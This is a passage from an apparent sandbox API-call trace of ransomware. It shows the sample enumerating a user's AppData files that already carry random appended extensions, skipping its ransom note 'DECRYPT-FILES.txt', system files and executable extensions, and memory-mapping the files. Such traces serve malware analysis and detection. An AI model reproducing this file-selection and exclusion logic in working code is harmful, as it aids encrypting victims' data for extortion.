"c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\identities\\{31810c36-5d23-4cce-a3b4-316ded195c38}\\0a16c9.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0180.311] CloseHandle (hObject=0x0) returned 0 [0180.311] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0180.311] FindNextFileW (in: hFindFile=0x479938, lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaa327c80, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaa327c80, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa327c80, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0180.311] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0180.311] FindNextFileW (in: hFindFile=0x479938, lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaa327c80, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaa327c80, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa327c80, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 0 [0180.311] FindClose (in: hFindFile=0x479938 | out: hFindFile=0x479938) returned 1 [0180.311] CloseHandle (hObject=0x26c) returned 1 [0180.312] FindNextFileW (in: hFindFile=0x4798f8, lpFindFileData=0x36ff010 | out: lpFindFileData=0x36ff010*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xaa327c80, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa327c80, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{31810C36-5D23-4CCE-A3B4-316DED195C38}\\", cAlternateFileName="{31810~1")) returned 0 [0180.312] FindClose (in: hFindFile=0x4798f8 | out: hFindFile=0x4798f8) returned 1 [0180.312] CloseHandle (hObject=0x264) returned 1 [0180.312] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbe1f0a20, ftCreationTime.dwHighDateTime=0x1d4ca1b, ftLastAccessTime.dwLowDateTime=0x1f37e4b0, ftLastAccessTime.dwHighDateTime=0x1d4c807, ftLastWriteTime.dwLowDateTime=0xaa327c80, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x722e, dwReserved0=0x0, dwReserved1=0x0, cFileName="ISBknX_Ny.docx.Gi2Q", cAlternateFileName="ISBKNX~1.GI2")) returned 1 [0180.312] lstrcmpiW (lpString1="ISBknX_Ny.docx.Gi2Q", lpString2="DECRYPT-FILES.txt") returned 1 [0180.312] lstrcmpiW (lpString1="ISBknX_Ny.docx.Gi2Q", lpString2="autorun.inf") returned 1 [0180.312] lstrcmpiW (lpString1="ISBknX_Ny.docx.Gi2Q", lpString2="boot.ini") returned 1 [0180.312] lstrcmpiW (lpString1="ISBknX_Ny.docx.Gi2Q", lpString2="desktop.ini") returned 1 [0180.312] lstrcmpiW (lpString1="ISBknX_Ny.docx.Gi2Q", lpString2="ntuser.dat") returned -1 [0180.312] lstrcmpiW (lpString1="ISBknX_Ny.docx.Gi2Q", lpString2="iconcache.db") returned 1 [0180.312] lstrcmpiW (lpString1="ISBknX_Ny.docx.Gi2Q", lpString2="bootsect.bak") returned 1 [0180.312] lstrcmpiW (lpString1="ISBknX_Ny.docx.Gi2Q", lpString2="ntuser.dat.log") returned -1 [0180.312] lstrcmpiW (lpString1="ISBknX_Ny.docx.Gi2Q", lpString2="thumbs.db") returned -1 [0180.312] lstrcmpiW (lpString1="ISBknX_Ny.docx.Gi2Q", lpString2="Bootfont.bin") returned 1 [0180.312] lstrlenW (lpString="ISBknX_Ny.docx.Gi2Q") returned 19 [0180.312] lstrcmpiW (lpString1="Gi2Q", lpString2="lnk") returned -1 [0180.312] lstrcmpiW (lpString1="Gi2Q", lpString2="exe") returned 1 [0180.312] lstrcmpiW (lpString1="Gi2Q", lpString2="sys") returned -1 [0180.312] lstrcmpiW (lpString1="Gi2Q", lpString2="dll") returned 1 [0180.312] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\") returned 46 [0180.312] lstrlenW (lpString="ISBknX_Ny.docx.Gi2Q") returned 19 [0180.312] lstrcpyW (in: lpString1=0x36fea5c, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\" [0180.312] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\", lpString2="ISBknX_Ny.docx.Gi2Q" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\ISBknX_Ny.docx.Gi2Q") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\ISBknX_Ny.docx.Gi2Q" [0180.312] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0180.312] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\ISBknX_Ny.docx.Gi2Q" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\isbknx_ny.docx.gi2q"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x264 [0180.313] GetFileSizeEx (in: hFile=0x264, lpFileSize=0x36fe228 | out: lpFileSize=0x36fe228*=29230) returned 1 [0180.313] CreateFileMappingW (hFile=0x264, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x268 [0180.313] MapViewOfFile (hFileMappingObject=0x268, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0180.321] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0180.321] CloseHandle (hObject=0x268) returned 1 [0180.321] CloseHandle (hObject=0x264) returned 1 [0180.321] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0180.321] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x7417a3b0, ftCreationTime.dwHighDateTime=0x1d4ce0d, ftLastAccessTime.dwLowDateTime=0x34c7e9b0, ftLastAccessTime.dwHighDateTime=0x1d4cce9, ftLastWriteTime.dwLowDateTime=0xaa373f40, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x12348, dwReserved0=0x0, dwReserved1=0x0, cFileName="ISyuUqVLVoKe2TYf1F.mkv.IOj6", cAlternateFileName="ISYUUQ~1.IOJ")) returned 1 [0180.321] lstrcmpiW (lpString1="ISyuUqVLVoKe2TYf1F.mkv.IOj6", lpString2="DECRYPT-FILES.txt") returned 1 [0180.321] lstrcmpiW (lpString1="ISyuUqVLVoKe2TYf1F.mkv.IOj6", lpString2="autorun.inf") returned 1 [0180.321] lstrcmpiW (lpString1="ISyuUqVLVoKe2TYf1F.mkv.IOj6", lpString2="boot.ini") returned 1 [0180.321] lstrcmpiW (lpString1="ISyuUqVLVoKe2TYf1F.mkv.IOj6", lpString2="desktop.ini") returned 1 [0180.321] lstrcmpiW (lpString1="ISyuUqVLVoKe2TYf1F.mkv.IOj6", lpString2="ntuser.dat") returned -1 [0180.321] lstrcmpiW (lpString1="ISyuUqVLVoKe2TYf1F.mkv.IOj6", lpString2="iconcache.db") returned 1 [0180.321] lstrcmpiW (lpString1="ISyuUqVLVoKe2TYf1F.mkv.IOj6", lpString2="bootsect.bak") returned 1 [0180.322] lstrcmpiW (lpString1="ISyuUqVLVoKe2TYf1F.mkv.IOj6", lpString2="ntuser.dat.log") returned -1 [0180.322] lstrcmpiW (lpString1="ISyuUqVLVoKe2TYf1F.mkv.IOj6", lpString2="thumbs.db") returned -1 [0180.322] lstrcmpiW (lpString1="ISyuUqVLVoKe2TYf1F.mkv.IOj6", lpString2="Bootfont.bin") returned 1 [0180.322] lstrlenW (lpString="ISyuUqVLVoKe2TYf1F.mkv.IOj6") returned 27 [0180.322] lstrcmpiW (lpString1="IOj6", lpString2="lnk") returned -1 [0180.322] lstrcmpiW (lpString1="IOj6", lpString2="exe") returned 1 [0180.322] lstrcmpiW (lpString1="IOj6", lpString2="sys") returned -1 [0180.322] lstrcmpiW (lpString1="IOj6", lpString2="dll") returned 1 [0180.322] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\") returned 46 [0180.322] lstrlenW (lpString="ISyuUqVLVoKe2TYf1F.mkv.IOj6") returned 27 [0180.322] lstrcpyW (in: lpString1=0x36fea5c, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\" [0180.322] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\", lpString2="ISyuUqVLVoKe2TYf1F.mkv.IOj6" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\ISyuUqVLVoKe2TYf1F.mkv.IOj6") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\ISyuUqVLVoKe2TYf1F.mkv.IOj6" [0180.322] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0180.322] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\ISyuUqVLVoKe2TYf1F.mkv.IOj6" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\isyuuqvlvoke2tyf1f.mkv.ioj6"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x264 [0180.322] GetFileSizeEx (in: hFile=0x264, lpFileSize=0x36fe228 | out: lpFileSize=0x36fe228*=74568) returned 1 [0180.322] CreateFileMappingW (hFile=0x264, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x268 [0180.322] MapViewOfFile (hFileMappingObject=0x268, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0180.323] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0180.324] CloseHandle (hObject=0x268) returned 1 [0180.324] CloseHandle (hObject=0x264) returned 1 [0180.324] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0180.324] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xab5a2530, ftCreationTime.dwHighDateTime=0x1d4ce0f, ftLastAccessTime.dwLowDateTime=0x71cf0d40, ftLastAccessTime.dwHighDateTime=0x1d4ce4f, ftLastWriteTime.dwLowDateTime=0xaa39a0a0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x10b11, dwReserved0=0x0, dwReserved1=0x0, cFileName="jO2V.bmp.44cBj", cAlternateFileName="JO2VBM~1.44C")) returned 1 [0180.324] lstrcmpiW (lpString1="jO2V.bmp.44cBj", lpString2="DECRYPT-FILES.txt") returned 1 [0180.324] lstrcmpiW (lpString1="jO2V.bmp.44cBj", lpString2="autorun.inf") returned 1 [0180.324] lstrcmpiW (lpString1="jO2V.bmp.44cBj", lpString2="boot.ini") returned 1 [0180.324] lstrcmpiW (lpString1="jO2V.bmp.44cBj", lpString2="desktop.ini") returned 1 [0180.324] lstrcmpiW (lpString1="jO2V.bmp.44cBj", lpString2="ntuser.dat") returned -1 [0180.324] lstrcmpiW (lpString1="jO2V.bmp.44cBj", lpString2="iconcache.db") returned 1 [0180.324] lstrcmpiW (lpString1="jO2V.bmp.44cBj", lpString2="bootsect.bak") returned 1 [0180.324] lstrcmpiW (lpString1="jO2V.bmp.44cBj", lpString2="ntuser.dat.log") returned -1 [0180.324] lstrcmpiW (lpString1="jO2V.bmp.44cBj", lpString2="thumbs.db") returned -1 [0180.324] lstrcmpiW (lpString1="jO2V.bmp.44cBj", lpString2="Bootfont.bin") returned 1 [0180.324] lstrlenW (lpString="jO2V.bmp.44cBj") returned 14 [0180.324] lstrcmpiW (lpString1="44cBj", lpString2="lnk") returned -1 [0180.324] lstrcmpiW (lpString1="44cBj", lpString2="exe") returned -1 [0180.324] lstrcmpiW (lpString1="44cBj", lpString2="sys") returned -1 [0180.324] lstrcmpiW (lpString1="44cBj", lpString2="dll") returned -1 [0180.324] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\") returned 46 [0180.324] lstrlenW (lpString="jO2V.bmp.44cBj") returned 14 [0180.324] lstrcpyW (in: lpString1=0x36fea5c, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\" [0180.324] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\", lpString2="jO2V.bmp.44cBj" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\jO2V.bmp.44cBj") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\jO2V.bmp.44cBj" [0180.324] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0180.325] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\jO2V.bmp.44cBj" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\jo2v.bmp.44cbj"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x264 [0180.325] GetFileSizeEx (in: hFile=0x264, lpFileSize=0x36fe228 | out: lpFileSize=0x36fe228*=68369) returned 1 [0180.325] CreateFileMappingW (hFile=0x264, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x268 [0180.325] MapViewOfFile (hFileMappingObject=0x268, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0180.330] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0180.330] CloseHandle (hObject=0x268) returned 1 [0180.330] CloseHandle (hObject=0x264) returned 1 [0180.330] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0180.330] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xdc8f2780, ftCreationTime.dwHighDateTime=0x1d4ca0a, ftLastAccessTime.dwLowDateTime=0xbe3c20d0, ftLastAccessTime.dwHighDateTime=0x1d4c8e3, ftLastWriteTime.dwLowDateTime=0xaa3e6360, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x1250, dwReserved0=0x0, dwReserved1=0x0, cFileName="khORsonbXGYfkGp.pdf.mLG6P0", cAlternateFileName="KHORSO~1.MLG")) returned 1 [0180.330] lstrcmpiW (lpString1="khORsonbXGYfkGp.pdf.mLG6P0", lpString2="DECRYPT-FILES.txt") returned 1 [0180.330] lstrcmpiW (lpString1="khORsonbXGYfkGp.pdf.mLG6P0", lpString2="autorun.inf") returned 1 [0180.330] lstrcmpiW (lpString1="khORsonbXGYfkGp.pdf.mLG6P0", lpString2="boot.ini") returned 1 [0180.330] lstrcmpiW (lpString1="khORsonbXGYfkGp.pdf.mLG6P0", lpString2="desktop.ini") returned 1 [0180.330] lstrcmpiW (lpString1="khORsonbXGYfkGp.pdf.mLG6P0", lpString2="ntuser.dat") returned -1 [0180.330] lstrcmpiW (lpString1="khORsonbXGYfkGp.pdf.mLG6P0", lpString2="iconcache.db") returned 1 [0180.330] lstrcmpiW (lpString1="khORsonbXGYfkGp.pdf.mLG6P0", lpString2="bootsect.bak") returned 1 [0180.330] lstrcmpiW (lpString1="khORsonbXGYfkGp.pdf.mLG6P0", lpString2="ntuser.dat.log") returned -1 [0180.330] lstrcmpiW (lpString1="khORsonbXGYfkGp.pdf.mLG6P0", lpString2="thumbs.db") returned -1 [0180.330] lstrcmpiW (lpString1="khORsonbXGYfkGp.pdf.mLG6P0", lpString2="Bootfont.bin") returned 1 [0180.330] lstrlenW (lpString="khORsonbXGYfkGp.pdf.mLG6P0") returned 26 [0180.330] lstrcmpiW (lpString1="mLG6P0", lpString2="lnk") returned 1 [0180.330] lstrcmpiW (lpString1="mLG6P0", lpString2="exe") returned 1 [0180.330] lstrcmpiW (lpString1="mLG6P0", lpString2="sys") returned -1 [0180.330] lstrcmpiW (lpString1="mLG6P0", lpString2="dll") returned 1 [0180.330] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\") returned 46 [0180.330] lstrlenW (lpString="khORsonbXGYfkGp.pdf.mLG6P0") returned 26 [0180.331] lstrcpyW (in: lpString1=0x36fea5c, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\" [0180.331] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\", lpString2="khORsonbXGYfkGp.pdf.mLG6P0" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\khORsonbXGYfkGp.pdf.mLG6P0") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\khORsonbXGYfkGp.pdf.mLG6P0" [0180.331] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0180.331] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\khORsonbXGYfkGp.pdf.mLG6P0" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\khorsonbxgyfkgp.pdf.mlg6p0"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x264 [0180.331] GetFileSizeEx (in: hFile=0x264, lpFileSize=0x36fe228 | out: lpFileSize=0x36fe228*=4688) returned 1 [0180.331] CreateFileMappingW (hFile=0x264, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x268 [0180.331] MapViewOfFile (hFileMappingObject=0x268, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0180.332] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0180.333] CloseHandle (hObject=0x268) returned 1 [0180.333] CloseHandle (hObject=0x264) returned 1 [0180.333] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0180.333] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x5565dec0, ftCreationTime.dwHighDateTime=0x1d4d487, ftLastAccessTime.dwLowDateTime=0x789079e0, ftLastAccessTime.dwHighDateTime=0x1d4c673, ftLastWriteTime.dwLowDateTime=0xaa40c4c0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x3e2d, dwReserved0=0x0, dwReserved1=0x0, cFileName="L0RHGHT3eFgSHF.m4a.Dsca3KU", cAlternateFileName="L0RHGH~1.DSC")) returned 1 [0180.333] lstrcmpiW (lpString1="L0RHGHT3eFgSHF.m4a.Dsca3KU", lpString2="DECRYPT-FILES.txt") returned 1 [0180.333] lstrcmpiW (lpString1="L0RHGHT3eFgSHF.m4a.Dsca3KU", lpString2="autorun.inf") returned 1 [0180.333] lstrcmpiW (lpString1="L0RHGHT3eFgSHF.m4a.Dsca3KU", lpString2="boot.ini") returned 1 [0180.333] lstrcmpiW (lpString1="L0RHGHT3eFgSHF.m4a.Dsca3KU", lpString2="desktop.ini") returned 1 [0180.333] lstrcmpiW (lpString1="L0RHGHT3eFgSHF.m4a.Dsca3KU", lpString2="ntuser.dat") returned -1 [0180.333] lstrcmpiW (lpString1="L0RHGHT3eFgSHF.m4a.Dsca3KU", lpString2="iconcache.db") returned 1 [0180.333] lstrcmpiW (lpString1="L0RHGHT3eFgSHF.m4a.Dsca3KU", lpString2="bootsect.bak") returned 1 [0180.333] lstrcmpiW (lpString1="L0RHGHT3eFgSHF.m4a.Dsca3KU", lpString2="ntuser.dat.log") returned -1 [0180.333] lstrcmpiW (lpString1="L0RHGHT3eFgSHF.m4a.Dsca3KU", lpString2="thumbs.db") returned -1 [0180.333] lstrcmpiW (lpString1="L0RHGHT3eFgSHF.m4a.Dsca3KU", lpString2="Bootfont.bin") returned 1 [0180.333] lstrlenW (lpString="L0RHGHT3eFgSHF.m4a.Dsca3KU") returned 26 [0180.333] lstrcmpiW (lpString1="Dsca3KU", lpString2="lnk") returned -1 [0180.333] lstrcmpiW (lpString1="Dsca3KU", lpString2="exe") returned -1 [0180.333] lstrcmpiW (lpString1="Dsca3KU", lpString2="sys") returned -1 [0180.333] lstrcmpiW (lpString1="Dsca3KU", lpString2="dll") returned 1 [0180.333] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\") returned 46 [0180.333] lstrlenW (lpString="L0RHGHT3eFgSHF.m4a.Dsca3KU") returned 26 [0180.333] lstrcpyW (in: lpString1=0x36fea5c, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\" [0180.333] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\", lpString2="L0RHGHT3eFgSHF.m4a.Dsca3KU" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\L0RHGHT3eFgSHF.m4a.Dsca3KU") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\L0RHGHT3eFgSHF.m4a.Dsca3KU" [0180.333] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0180.334] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\L0RHGHT3eFgSHF.m4a.Dsca3KU" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\l0rhght3efgshf.m4a.dsca3ku"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x264 [0180.334] GetFileSizeEx (in: hFile=0x264, lpFileSize=0x36fe228 | out: lpFileSize=0x36fe228*=15917) returned 1 [0180.334] CreateFileMappingW (hFile=0x264, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x268 [0180.334] MapViewOfFile (hFileMappingObject=0x268, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0180.336] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0180.336] CloseHandle (hObject=0x268) returned 1 [0180.336] CloseHandle (hObject=0x264) returned 1 [0180.336] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0180.336] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x9eabce30, ftCreationTime.dwHighDateTime=0x1d4c877, ftLastAccessTime.dwLowDateTime=0xb8df5a90, ftLastAccessTime.dwHighDateTime=0x1d4cecd, ftLastWriteTime.dwLowDateTime=0xaa432620, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x14e9, dwReserved0=0x0, dwReserved1=0x0, cFileName="lxivA.wav.NGeQd3o", cAlternateFileName="LXIVAW~1.NGE")) returned 1 [0180.336] lstrcmpiW (lpString1="lxivA.wav.NGeQd3o", lpString2="DECRYPT-FILES.txt") returned 1 [0180.336] lstrcmpiW (lpString1="lxivA.wav.NGeQd3o", lpString2="autorun.inf") returned 1 [0180.336] lstrcmpiW (lpString1="lxivA.wav.NGeQd3o", lpString2="boot.ini") returned 1 [0180.336] lstrcmpiW (lpString1="lxivA.wav.NGeQd3o", lpString2="desktop.ini") returned 1 [0180.336] lstrcmpiW (lpString1="lxivA.wav.NGeQd3o", lpString2="ntuser.dat") returned -1 [0180.336] lstrcmpiW (lpString1="lxivA.wav.NGeQd3o", lpString2="iconcache.db") returned 1 [0180.337] lstrcmpiW (lpString1="lxivA.wav.NGeQd3o", lpString2="bootsect.bak") returned 1 [0180.337] lstrcmpiW (lpString1="lxivA.wav.NGeQd3o", lpString2="ntuser.dat.log") returned -1 [0180.337] lstrcmpiW (lpString1="lxivA.wav.NGeQd3o", lpString2="thumbs.db") returned -1 [0180.337] lstrcmpiW (lpString1="lxivA.wav.NGeQd3o", lpString2="Bootfont.bin") returned 1 [0180.337] lstrlenW (lpString="lxivA.wav.NGeQd3o") returned 17 [0180.337] lstrcmpiW (lpString1="NGeQd3o", lpString2="lnk") returned 1 [0180.337] lstrcmpiW (lpString1="NGeQd3o", lpString2="exe") returned 1 [0180.337] lstrcmpiW (lpString1="NGeQd3o", lpString2="sys") returned -1 [0180.337] lstrcmpiW (lpString1="NGeQd3o", lpString2="dll") returned 1 [0180.337] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\") returned 46 [0180.337] lstrlenW (lpString="lxivA.wav.NGeQd3o") returned 17 [0180.337] lstrcpyW (in: lpString1=0x36fea5c, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\" [0180.337] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\", lpString2="lxivA.wav.NGeQd3o" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\lxivA.wav.NGeQd3o") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\lxivA.wav.NGeQd3o" [0180.337] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0180.337] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\lxivA.wav.NGeQd3o" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\lxiva.wav.ngeqd3o"), dwDesiredAccess=0xc0000000, 